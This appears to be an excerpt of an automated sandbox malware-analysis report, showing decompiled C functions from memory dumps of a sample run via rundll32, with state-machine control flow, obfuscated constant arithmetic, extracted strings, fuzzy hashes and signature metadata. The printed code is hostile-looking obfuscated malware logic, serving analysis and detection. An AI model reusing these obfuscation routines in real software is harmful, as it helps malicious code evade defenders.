			E0020C04C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t150;
				void* _t174;
				void* _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a8);
				_t213 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t150);
				_v80 = 0xc784;
				_t217 =  &(( &_v112)[4]);
				_v80 = _v80 << 4;
				_t214 = 0;
				_t189 = 0x33fb58ad;
				_t181 = 0x6b;
				_v80 = _v80 * 0x28;
				_v80 = _v80 ^ 0x01f2d8b7;
				_v84 = 0x50fb;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 + 0x937e;
				_v84 = _v84 ^ 0x0000fdde;
				_v56 = 0x327d;
				_v56 = _v56 + 0xffffdcf3;
				_v56 = _v56 ^ 0x00004b6f;
				_v88 = 0x146d;
				_v88 = _v88 ^ 0x8349746f;
				_v88 = _v88 / _t181;
				_v88 = _v88 ^ 0x013a5398;
				_v60 = 0xe2fe;
				_t182 = 0x25;
				_v60 = _v60 * 0x79;
				_v60 = _v60 ^ 0x006b2efa;
				_v64 = 0xc02b;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x00002cf4;
				_v92 = 0x8680;
				_v92 = _v92 * 0x7e;
				_v92 = _v92 + 0xffff14d8;
				_v92 = _v92 ^ 0x004119fe;
				_v96 = 0x22ae;
				_v96 = _v96 * 0x57;
				_v96 = _v96 * 0x15;
				_v96 = _v96 ^ 0x00f7010a;
				_v68 = 0x9e2a;
				_v68 = _v68 << 0xa;
				_v68 = _v68 ^ 0x0278df5a;
				_v100 = 0x70f1;
				_v100 = _v100 + 0x9f07;
				_v100 = _v100 << 7;
				_v100 = _v100 ^ 0x0087eaa7;
				_v72 = 0xae27;
				_v72 = _v72 + 0xffff81b6;
				_v72 = _v72 ^ 0x00001dbd;
				_v76 = 0xeb69;
				_v76 = _v76 + 0xe753;
				_v76 = _v76 / _t182;
				_v76 = _v76 ^ 0x00001cc5;
				_v104 = 0x4553;
				_v104 = _v104 + 0xffffebb9;
				_t183 = 0x7e;
				_v104 = _v104 / _t183;
				_t184 = 0xe;
				_v104 = _v104 / _t184;
				_v104 = _v104 ^ 0x00003b66;
				_v108 = 0x5045;
				_t185 = 0x38;
				_v108 = _v108 / _t185;
				_t186 = 0x45;
				_v108 = _v108 * 0x58;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 ^ 0x002412f1;
				_v112 = 0x2d31;
				_v112 = _v112 / _t186;
				_v112 = _v112 ^ 0x7267b250;
				_v112 = _v112 + 0xd72;
				_v112 = _v112 ^ 0x7267a792;
				while(_t189 != 0x8879467) {
					if(_t189 == 0x1932f021) {
						_t174 = E0020D290(_v88, _v60, _v64, _t213, _v92,  &_v52);
						_t217 =  &(_t217[4]);
						__eflags = _t174;
						if(__eflags != 0) {
							_t189 = 0x36f0c2c4;
							continue;
						}
					} else {
						if(_t189 == 0x33be0ba1) {
							_t147 = _t213 + 8; // 0x3ba4bc1b
							__eflags = E001F9899(_t147, _v76, __eflags,  &_v52, _v104, _v108, _v112);
							_t214 =  !=  ? 1 : _t214;
							__eflags = _t214;
						} else {
							if(_t189 == 0x33fb58ad) {
								_t189 = 0x8879467;
								continue;
							} else {
								if(_t189 != 0x36f0c2c4) {
									L12:
									__eflags = _t189 - 0x2249cb7b;
									if(__eflags != 0) {
										continue;
									} else {
									}
								} else {
									_t130 = _t213 + 4; // 0x3ba4bc17
									_t180 = E0020D290(_v96, _v68, _v100, _t130, _v72,  &_v52);
									_t217 =  &(_t217[4]);
									if(_t180 != 0) {
										_t189 = 0x33be0ba1;
										continue;
									}
								}
							}
						}
					}
					return _t214;
				}
				E0020F3E9(_v80, _v84, _v56, _a4,  &_v52);
				_t217 =  &(_t217[3]);
				_t189 = 0x1932f021;
				goto L12;
			}

0x0020c053
0x0020c05a
0x0020c05c
0x0020c063
0x0020c064
0x0020c065
0x0020c06a
0x0020c072
0x0020c075
0x0020c081
0x0020c083
0x0020c08a
0x0020c08d
0x0020c091
0x0020c099
0x0020c0a1
0x0020c0a6
0x0020c0ae
0x0020c0b6
0x0020c0be
0x0020c0c6
0x0020c0ce
0x0020c0d6
0x0020c0e6
0x0020c0ea
0x0020c0f2
0x0020c0ff
0x0020c102
0x0020c106
0x0020c10e
0x0020c116
0x0020c11b
0x0020c123
0x0020c130
0x0020c134
0x0020c13c
0x0020c144
0x0020c151
0x0020c15a
0x0020c15e
0x0020c166
0x0020c16e
0x0020c173
0x0020c17b
0x0020c183
0x0020c18b
0x0020c190
0x0020c198
0x0020c1a0
0x0020c1a8
0x0020c1b0
0x0020c1b8
0x0020c1c8
0x0020c1cc
0x0020c1d4
0x0020c1dc
0x0020c1e8
0x0020c1ed
0x0020c1f7
0x0020c1fc
0x0020c202
0x0020c20f
0x0020c21b
0x0020c220
0x0020c22b
0x0020c22c
0x0020c235
0x0020c239
0x0020c241
0x0020c254
0x0020c258
0x0020c260
0x0020c268
0x0020c270
0x0020c27a
0x0020c2db
0x0020c2e0
0x0020c2e3
0x0020c2e5
0x0020c2e7
0x00000000
0x0020c2e7
0x0020c27c
0x0020c27e
0x0020c32d
0x0020c344
0x0020c346
0x0020c346
0x0020c284
0x0020c28a
0x0020c2c1
0x00000000
0x0020c28c
0x0020c292
0x0020c313
0x0020c313
0x0020c319
0x00000000
0x00000000
0x0020c31f
0x0020c294
0x0020c29d
0x0020c2ad
0x0020c2b2
0x0020c2b7
0x0020c2bd
0x00000000
0x0020c2bd
0x0020c2b7
0x0020c292
0x0020c28a
0x0020c27e
0x0020c352
0x0020c352
0x0020c306
0x0020c30b
0x0020c30e
0x00000000

Strings

EP, xrefs: 0020C20F
f;, xrefs: 0020C202
S, xrefs: 0020C1B8
oK, xrefs: 0020C0C6
r, xrefs: 0020C260

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: EP$S$f;$oK$r
API String ID: 0-800867564
Opcode ID: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
Instruction ID: 1696a5e1a551233ca2f0bbdf8425c11e80fb083d3c3ae73e7c41c10db47e6b1d
Opcode Fuzzy Hash: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
Instruction Fuzzy Hash: 258164B11183419FE354CF65C88982FFBF5BBC9348F508A1EF599862A1D3B5CA498F42

Uniqueness

Uniqueness Score: -1.00%

Function 002AB5C0, Relevance: 6.4, Strings: 5, Instructions: 182COMMON

Download Yara Rule

Strings

f;, xrefs: 002AB776
EP, xrefs: 002AB783
S, xrefs: 002AB72C
r, xrefs: 002AB7D4
oK, xrefs: 002AB63A

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: EP$S$f;$oK$r
API String ID: 0-800867564
Opcode ID: 523d3ec5c241eef9de5929b01c576698cc3ae075f621830cd6087ecd375304d1
Instruction ID: 5911df7f909cb02bd69a4074e06121cd0391855a72860343edefbbc173171a68
Opcode Fuzzy Hash: 523d3ec5c241eef9de5929b01c576698cc3ae075f621830cd6087ecd375304d1
Instruction Fuzzy Hash: D48172715083419FE354CF24C88982FFBE5BBC9308F50891EF699862A1D7B5CA59CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0020CDCC, Relevance: 6.4, Strings: 5, Instructions: 160
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0020CDCC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a24) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t139;
				signed int _t152;
				void* _t157;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t175;
				signed int* _t178;

				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t139);
				_v28 = 0x325f;
				_t178 =  &(( &_v56)[8]);
				_v28 = _v28 + 0xffff4d87;
				_v28 = _v28 + 0xffff7eee;
				_t175 = 0;
				_v28 = _v28 ^ 0xfffeea83;
				_t157 = 0x2e625de7;
				_v16 = 0x7ea1;
				_t171 = 0x4c;
				_v16 = _v16 * 0x50;
				_v16 = _v16 ^ 0x0027b5c0;
				_v48 = 0xb396;
				_v48 = _v48 << 2;
				_v48 = _v48 + 0xffffd4e6;
				_v48 = _v48 * 0x23;
				_v48 = _v48 ^ 0x005c32d3;
				_v52 = 0x4c8e;
				_v52 = _v52 >> 4;
				_v52 = _v52 + 0xffff8362;
				_v52 = _v52 | 0xaf524c7b;
				_v52 = _v52 ^ 0xffffb92c;
				_v20 = 0xd7f5;
				_v20 = _v20 | 0xc3990154;
				_v20 = _v20 ^ 0xc3999ac5;
				_v56 = 0x9c91;
				_v56 = _v56 | 0x8c86dbc7;
				_v56 = _v56 + 0xf56e;
				_v56 = _v56 ^ 0x560a30e6;
				_v56 = _v56 ^ 0xda8da389;
				_v12 = 0xdf7a;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0x0001eefc;
				_v24 = 0x3c6;
				_v24 = _v24 | 0x5cdca8ce;
				_v24 = _v24 + 0x7ec4;
				_v24 = _v24 ^ 0x5cdd52aa;
				_v4 = 0xc884;
				_v4 = _v4 | 0x864be180;
				_v4 = _v4 ^ 0x864b8e34;
				_v32 = 0xecf0;
				_v32 = _v32 / _t171;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x00000683;
				_v8 = 0xa81d;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x05408dca;
				_v36 = 0x9864;
				_t172 = 0x59;
				_v36 = _v36 / _t172;
				_v36 = _v36 ^ 0xaaa5894b;
				_v36 = _v36 + 0xffff7394;
				_v36 = _v36 ^ 0xaaa4dea0;
				_v40 = 0xd8eb;
				_v40 = _v40 + 0x511b;
				_v40 = _v40 >> 3;
				_v40 = _v40 + 0xffff6e25;
				_v40 = _v40 ^ 0xffffcd83;
				_v44 = 0x92f;
				_v44 = _v44 ^ 0xfb5f1719;
				_v44 = _v44 << 3;
				_t173 = 0x32;
				_t174 = _v4;
				_v44 = _v44 / _t173;
				_v44 = _v44 ^ 0x0461405b;
				do {
					while(_t157 != 0xc7aef4e) {
						if(_t157 == 0x1f37240b) {
							_t152 = E001FCF11(0, _a16, _v28, 0xffffffff, _v16, _t157, _v48, 0, _v52, _a8, _v20, _v56);
							_t174 = _t152;
							_t178 =  &(_t178[0xa]);
							if(_t152 != 0) {
								_t157 = 0xc7aef4e;
								continue;
							}
						} else {
							if(_t157 == 0x2e625de7) {
								_t157 = 0x1f37240b;
								continue;
							} else {
								if(_t157 != 0x32a206ac) {
									goto L13;
								} else {
									E001FCF11(_t174, _a16, _v4, 0xffffffff, _v32, _t157, _v8, _t175, _v36, _a8, _v40, _v44);
								}
							}
						}
						L6:
						return _t175;
					}
					_push(_t157);
					_t175 = E002057E8(_t174 + _t174);
					if(_t175 == 0) {
						_t157 = 0x3ab8f213;
						goto L13;
					} else {
						_t157 = 0x32a206ac;
						continue;
					}
					goto L6;
					L13:
				} while (_t157 != 0x3ab8f213);
				goto L6;
			}

0x0020cdd3
0x0020cdd7
0x0020cdd9
0x0020cddd
0x0020cddf
0x0020cde3
0x0020cde7
0x0020cde8
0x0020cde9
0x0020cdee
0x0020cdf6
0x0020cdf9
0x0020ce03
0x0020ce0b
0x0020ce0d
0x0020ce15
0x0020ce1a
0x0020ce29
0x0020ce2c
0x0020ce30
0x0020ce38
0x0020ce40
0x0020ce45
0x0020ce52
0x0020ce56
0x0020ce5e
0x0020ce66
0x0020ce6b
0x0020ce73
0x0020ce7b
0x0020ce83
0x0020ce8b
0x0020ce93
0x0020ce9b
0x0020cea3
0x0020ceab
0x0020ceb3
0x0020cebb
0x0020cec3
0x0020cecb
0x0020cecf
0x0020ced7
0x0020cedf
0x0020cee7
0x0020ceef
0x0020cef7
0x0020ceff
0x0020cf07
0x0020cf0f
0x0020cf1f
0x0020cf23
0x0020cf28
0x0020cf2d
0x0020cf35
0x0020cf3d
0x0020cf42
0x0020cf4a
0x0020cf56
0x0020cf59
0x0020cf5d
0x0020cf65
0x0020cf6d
0x0020cf75
0x0020cf7d
0x0020cf85
0x0020cf8a
0x0020cf92
0x0020cf9a
0x0020cfa4
0x0020cfb1
0x0020cfc1
0x0020cfc4
0x0020cfc8
0x0020cfcc
0x0020cfd4
0x0020cfd4
0x0020cfde
0x0020d057
0x0020d05c
0x0020d05e
0x0020d063
0x0020d065
0x00000000
0x0020d065
0x0020cfe0
0x0020cfe6
0x0020d02c
0x00000000
0x0020cfe8
0x0020cfee
0x00000000
0x0020cff4
0x0020d01a
0x0020d01f
0x0020cfee
0x0020cfe6
0x0020d023
0x0020d02b
0x0020d02b
0x0020d074
0x0020d07d
0x0020d082
0x0020d08e
0x00000000
0x0020d084
0x0020d084
0x00000000
0x0020d084
0x00000000
0x0020d093
0x0020d093
0x00000000

Strings

/, xrefs: 0020CF9A
]b., xrefs: 0020CFE0
]b., xrefs: 0020CE15
_2, xrefs: 0020CDEE
0V, xrefs: 0020CEB3

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$_2$0V$]b.$]b.
API String ID: 0-2210830570
Opcode ID: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
Instruction ID: 91d3d139e13e26af753d40c7fa2aeac6080f32f743bed4c72ba5190f89791615
Opcode Fuzzy Hash: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
Instruction Fuzzy Hash: 8271647150D342AFD758CF65C84991FFBE2BBC4718F108A1DF196562A0C3B58A1ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 002AC340, Relevance: 6.4, Strings: 5, Instructions: 160COMMON

Download Yara Rule

Strings

0V, xrefs: 002AC427
]b., xrefs: 002AC389
]b., xrefs: 002AC554
/, xrefs: 002AC50E
_2, xrefs: 002AC362

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$_2$0V$]b.$]b.
API String ID: 0-2210830570
Opcode ID: dbafd8c35522cc6269d988f9fdf96b9502395aae9cac728126bfe9addc1169fc
Instruction ID: 0aad195012bc63f7f20365ed768a2135bcdb77c413850e90be4801fa1db87951
Opcode Fuzzy Hash: dbafd8c35522cc6269d988f9fdf96b9502395aae9cac728126bfe9addc1169fc
Instruction Fuzzy Hash: B071747150C3429FD758CF65C84981FFBE2BBC4718F204A1DF1A6662A0C7B5CA1A8F86

Uniqueness

Uniqueness Score: -1.00%

Function 00207570, Relevance: 6.4, Strings: 5, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00207570(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v584;
				void* _t176;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;

				_v20 = 0x17f2;
				_t183 = 0x21;
				_v20 = _v20 / _t183;
				_v20 = _v20 + 0x6d93;
				_v20 = _v20 ^ 0xb3130aa6;
				_v20 = _v20 ^ 0xb31362a2;
				_v44 = 0x7846;
				_t184 = 0x2b;
				_v44 = _v44 / _t184;
				_v44 = _v44 | 0x2d637405;
				_v44 = _v44 ^ 0x2d633d3a;
				_v12 = 0x826a;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xfdce;
				_v12 = _v12 ^ 0x01053037;
				_v40 = 0xb008;
				_t185 = 9;
				_v40 = _v40 / _t185;
				_v40 = _v40 | 0xdff8508a;
				_v40 = _v40 ^ 0xdff82a49;
				_v16 = 0x97c9;
				_v16 = _v16 >> 6;
				_v16 = _v16 << 0xd;
				_t186 = 0x13;
				_v16 = _v16 / _t186;
				_v16 = _v16 ^ 0x0003c223;
				_v52 = 0xe117;
				_v52 = _v52 + 0xb465;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x00cab1cc;
				_v8 = 0x7d37;
				_v8 = _v8 ^ 0x8829a720;
				_v8 = _v8 << 0xa;
				_t187 = 0x5d;
				_v8 = _v8 * 0x3b;
				_v8 = _v8 ^ 0x950d599f;
				_v28 = 0xafcc;
				_v28 = _v28 / _t187;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x00004226;
				_v56 = 0x4900;
				_v56 = _v56 | 0xacb64693;
				_v56 = _v56 ^ 0xacb6052b;
				_v24 = 0xef8a;
				_v24 = _v24 + 0xf857;
				_v24 = _v24 ^ 0xfd20d672;
				_v24 = _v24 * 0x1d;
				_v24 = _v24 ^ 0xacc29ce3;
				_v48 = 0xd87;
				_v48 = _v48 | 0xb3f54364;
				_v48 = _v48 + 0xffff5c7b;
				_v48 = _v48 ^ 0xb3f4bccb;
				_v60 = 0x28ae;
				_v60 = _v60 + 0xfffff49f;
				_v60 = _v60 ^ 0x000001f3;
				_v36 = 0xf8cf;
				_v36 = _v36 ^ 0x7fa8aefd;
				_v36 = _v36 + 0xffff1020;
				_v36 = _v36 ^ 0x7fa70865;
				_v32 = 0x4e50;
				_t188 = 0xf;
				_v32 = _v32 * 0x79;
				_t189 = 6;
				_v32 = _v32 / _t188;
				_v32 = _v32 ^ 0x0002677d;
				_v64 = 0x2ab7;
				_v64 = _v64 / _t189;
				_v64 = _v64 ^ 0x00007a29;
				_t176 = E001F1E13(_v20, _v44, _v12, _v40,  *0x2121b0 + 0x10);
				_t213 = _a4 + 0x2c;
				if(E001FD867(_a4 + 0x2c, _v16, _t176, _v52, _v8, _v28) != 0) {
					E0020DEE8(_v56,  &_v584, _v24, _t213, _a8, _v48);
					E001F3CA0(_v60, _v36, _v32,  &_v584, _v64);
				}
				return 1;
			}

0x00207579
0x00207588
0x0020758d
0x00207592
0x00207599
0x002075a0
0x002075a7
0x002075b1
0x002075b6
0x002075bb
0x002075c2
0x002075c9
0x002075d0
0x002075d4
0x002075d8
0x002075df
0x002075e6
0x002075f0
0x002075f5
0x002075fa
0x00207601
0x00207608
0x0020760f
0x00207613
0x0020761a
0x0020761f
0x00207624
0x0020762b
0x00207632
0x00207639
0x0020763d
0x00207644
0x0020764b
0x00207652
0x0020765a
0x0020765b
0x0020765e
0x00207665
0x00207671
0x00207674
0x00207677
0x0020767e
0x00207685
0x0020768c
0x00207693
0x0020769a
0x002076a1
0x002076ac
0x002076af
0x002076b6
0x002076bd
0x002076c4
0x002076cb
0x002076d2
0x002076d9
0x002076e0
0x002076e7
0x002076ee
0x002076f5
0x002076fe
0x00207705
0x00207712
0x00207715
0x0020771d
0x0020771e
0x00207723
0x0020772a
0x00207736
0x00207739
0x00207755
0x00207763
0x00207779
0x0020778e
0x002077a6
0x002077ab
0x002077b5

Strings

)z, xrefs: 00207739
:=c-, xrefs: 002075C2
PN, xrefs: 00207705
&B, xrefs: 00207677
7}, xrefs: 00207644

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: &B$)z$7}$:=c-$PN
API String ID: 1586166983-136981183
Opcode ID: a16e82f3ba2830907d321d70d4bae8a069863067ead6639a76521e74076f8ec1
Instruction ID: 4904b98a61c1428af3c7d986bea1203b7b562cb35b1266ad1c6f246c541cfbed
Opcode Fuzzy Hash: a16e82f3ba2830907d321d70d4bae8a069863067ead6639a76521e74076f8ec1
Instruction Fuzzy Hash: 8E611671D0020EEBEF48CFE5E98A9EEBBB2FB44314F208059E511B6290D7B95A15CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002A6AE4, Relevance: 6.4, Strings: 5, Instructions: 145COMMON

Download Yara Rule

Strings

&B, xrefs: 002A6BEB
PN, xrefs: 002A6C79
:=c-, xrefs: 002A6B36
)z, xrefs: 002A6CAD
7}, xrefs: 002A6BB8

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &B$)z$7}$:=c-$PN
API String ID: 0-136981183
Opcode ID: 1b072062ead452e80575b3bbf8ec65252449acf793fe550bcab0f1ef1905e61c
Instruction ID: dc62c0a2c1bf6c8abb8a7564469acc4bcaa4bf812b05b87527ddfd96e94be93c
Opcode Fuzzy Hash: 1b072062ead452e80575b3bbf8ec65252449acf793fe550bcab0f1ef1905e61c
Instruction Fuzzy Hash: AE611371D0020EEBEF48CFE5D98A9EEBBB2FB44314F208059E511B6290D7B95A15CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001FC6EF, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E001FC6EF(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t105;
				intOrPtr* _t118;
				void* _t120;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t131;
				signed int* _t133;

				_push(_a20);
				_t131 = __edx;
				_t118 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t105);
				_v32 = 0x6ec3;
				_t133 =  &(( &_v48)[7]);
				_v32 = _v32 << 2;
				_v32 = _v32 >> 0xd;
				_t128 = 0;
				_v32 = _v32 ^ 0x00000124;
				_t120 = 0x2e625de7;
				_v20 = 0xd76a;
				_t129 = 5;
				_v20 = _v20 / _t129;
				_v20 = _v20 ^ 0x000055da;
				_v48 = 0x58a7;
				_v48 = _v48 + 0x6c8;
				_v48 = _v48 << 0xb;
				_v48 = _v48 << 9;
				_v48 = _v48 ^ 0xf6f0317b;
				_v36 = 0x5d19;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 + 0xb738;
				_v36 = _v36 ^ 0x0027d757;
				_v24 = 0x73a3;
				_v24 = _v24 + 0x4f0f;
				_v24 = _v24 ^ 0x0000ed3d;
				_v44 = 0x403e;
				_v44 = _v44 ^ 0xd0448639;
				_v44 = _v44 + 0xffffdeb2;
				_v44 = _v44 << 4;
				_v44 = _v44 ^ 0x044a6664;
				_v16 = 0x1c10;
				_v16 = _v16 * 0x51;
				_v16 = _v16 ^ 0x0008f1ff;
				_v4 = 0x63b7;
				_v4 = _v4 << 0x10;
				_v4 = _v4 ^ 0x63b7360b;
				_v28 = 0x3e7f;
				_v28 = _v28 ^ 0x7d4cf8f0;
				_t130 = _v4;
				_v28 = _v28 * 0x2c;
				_v28 = _v28 ^ 0x89322d32;
				_v40 = 0xdd6b;
				_v40 = _v40 + 0xfc8c;
				_v40 = _v40 >> 0x10;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x0000558e;
				_v8 = 0x49f9;
				_v8 = _v8 + 0xfffff29f;
				_v8 = _v8 ^ 0x00000d42;
				_v12 = 0x318;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x0000321b;
				do {
					while(_t120 != 0xc7aef4e) {
						if(_t120 == 0x1f37240b) {
							_t130 = E001F9A00(_v32, _t120, 0, _v20, _a16, 0, _a12, _v48, _t120, _v36, _v24, _t131);
							_t133 =  &(_t133[0xb]);
							if(_t130 == 0) {
								L7:
								return _t128;
							}
							_t120 = 0xc7aef4e;
							continue;
						}
						if(_t120 == 0x2e625de7) {
							_t120 = 0x1f37240b;
							continue;
						}
						if(_t120 != 0x32a206ac) {
							goto L14;
						}
						E001F9A00(_v4, _t120, _t128, _v28, _a16, _t130, _a12, _v40, _t120, _v8, _v12, _t131);
						if(_t118 != 0) {
							 *_t118 = _t130;
						}
						goto L7;
					}
					_push(_t120);
					_t128 = E002057E8(_t130);
					if(_t128 == 0) {
						_t120 = 0x3ab8f213;
						goto L14;
					}
					_t120 = 0x32a206ac;
					continue;
					L14:
				} while (_t120 != 0x3ab8f213);
				goto L7;
			}

0x001fc6f6
0x001fc6fa
0x001fc6fc
0x001fc6fe
0x001fc702
0x001fc706
0x001fc70a
0x001fc70e
0x001fc70f
0x001fc710
0x001fc715
0x001fc71d
0x001fc720
0x001fc727
0x001fc72c
0x001fc72e
0x001fc736
0x001fc73b
0x001fc749
0x001fc74c
0x001fc750
0x001fc758
0x001fc760
0x001fc768
0x001fc76d
0x001fc772
0x001fc77a
0x001fc787
0x001fc78b
0x001fc793
0x001fc79b
0x001fc7a3
0x001fc7ab
0x001fc7b3
0x001fc7bb
0x001fc7c3
0x001fc7cb
0x001fc7d0
0x001fc7d8
0x001fc7e5
0x001fc7e9
0x001fc7f1
0x001fc7f9
0x001fc7fe
0x001fc806
0x001fc80e
0x001fc81b
0x001fc81f
0x001fc823
0x001fc82b
0x001fc833
0x001fc83b
0x001fc840
0x001fc845
0x001fc84d
0x001fc855
0x001fc85d
0x001fc865
0x001fc86d
0x001fc872
0x001fc87a
0x001fc87a
0x001fc88c
0x001fc90a
0x001fc90c
0x001fc911
0x001fc8d1
0x001fc8da
0x001fc8da
0x001fc913
0x00000000
0x001fc913
0x001fc894
0x001fc8db
0x00000000
0x001fc8db
0x001fc89c
0x00000000
0x00000000
0x001fc8c3
0x001fc8cd
0x001fc8cf
0x001fc8cf
0x00000000
0x001fc8cd
0x001fc925
0x001fc92d
0x001fc932
0x001fc93e
0x00000000
0x001fc93e
0x001fc934
0x00000000
0x001fc943
0x001fc943
0x00000000

Strings

=, xrefs: 001FC7AB
B, xrefs: 001FC85D
>@, xrefs: 001FC7B3
]b., xrefs: 001FC88E
]b., xrefs: 001FC736

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =$>@$B$]b.$]b.
API String ID: 0-2184513905
Opcode ID: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
Instruction ID: acdc73b07e97d0aac30c651c24f37886baa76ef77c693d4169be1571f656e304
Opcode Fuzzy Hash: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
Instruction Fuzzy Hash: 5B517572008345AFD359CF61C98992BBBE1FBC8798F004A1DF69652260C3B5CA19DF97

Uniqueness

Uniqueness Score: -1.00%

Function 0029BC63, Relevance: 6.4, Strings: 5, Instructions: 140COMMON

Download Yara Rule

Strings

]b., xrefs: 0029BE02
]b., xrefs: 0029BCAA
>@, xrefs: 0029BD27
=, xrefs: 0029BD1F
B, xrefs: 0029BDD1

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =$>@$B$]b.$]b.
API String ID: 0-2184513905
Opcode ID: 47afd95250530385e6c1ff70f7cb0bd824665528d1b1afa175986317301c5085
Instruction ID: 8a1d9ef2b5836ff6abae2a29ef04b4d8a028bac111e96974810b039ebf208621
